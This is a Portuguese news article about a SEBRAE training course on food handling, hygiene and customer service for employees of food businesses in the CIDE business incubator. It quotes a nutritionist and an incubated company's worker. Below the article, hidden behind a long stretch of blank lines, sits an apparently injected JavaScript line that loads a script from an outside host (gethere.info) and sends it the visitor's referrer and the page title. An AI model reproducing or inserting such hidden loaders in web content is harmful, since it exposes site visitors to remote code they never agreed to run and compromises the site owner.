Formação reúne empreendedores do setor de Alimentação e de Bebidas

Participantes do curso de manipulação de alimentos, no SEBRAE.
Participantes do curso de manipulação de alimentos, no SEBRAE.

 

 

Com o objetivo de melhorar a capacitação no preparo e manipulação de alimentos, e no atendimento aos clientes, os empreendedores e funcionários de empresas do setor de alimentos, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE) receberam, durante duas semanas, do Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (SEBRAE) formação com consultores e nutricionistas especializados.

 

Conforme a nutricionista Ana Rita Quadros, o controle de qualidade dos alimentos envolve técnicas e procedimentos adequados. “As técnicas transmitidas no curso garantem qualidade, higiene e segurança durante o preparo dos alimentos e, consequentemente, segurança na hora de consumi-los”, diz Quadros, acrescentando que curso promove também mudanças de atitude nos responsáveis pela fabricação de produtos alimentícios, evitando possíveis contaminações.

 

Para o funcionário da Amazon Doces, empresa incubada no CIDE, Raimundo Oliveira, o curso de manipulação de alimentos vai além do aspecto empresarial. “O que aprendemos serve para colocar em prática na empresa e em casa, no dia a dia de cada um. Técnicas de higienização, limpeza do local de trabalho, da farda, barba cortada, não misturar as louças, etc. são coisas que aprendemos e vamos praticar”, conta.

Funcionários de empresas do CIDE estiveram no curso do SEBRAE.
Funcionários de empresas do CIDE estiveram no curso do SEBRAE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *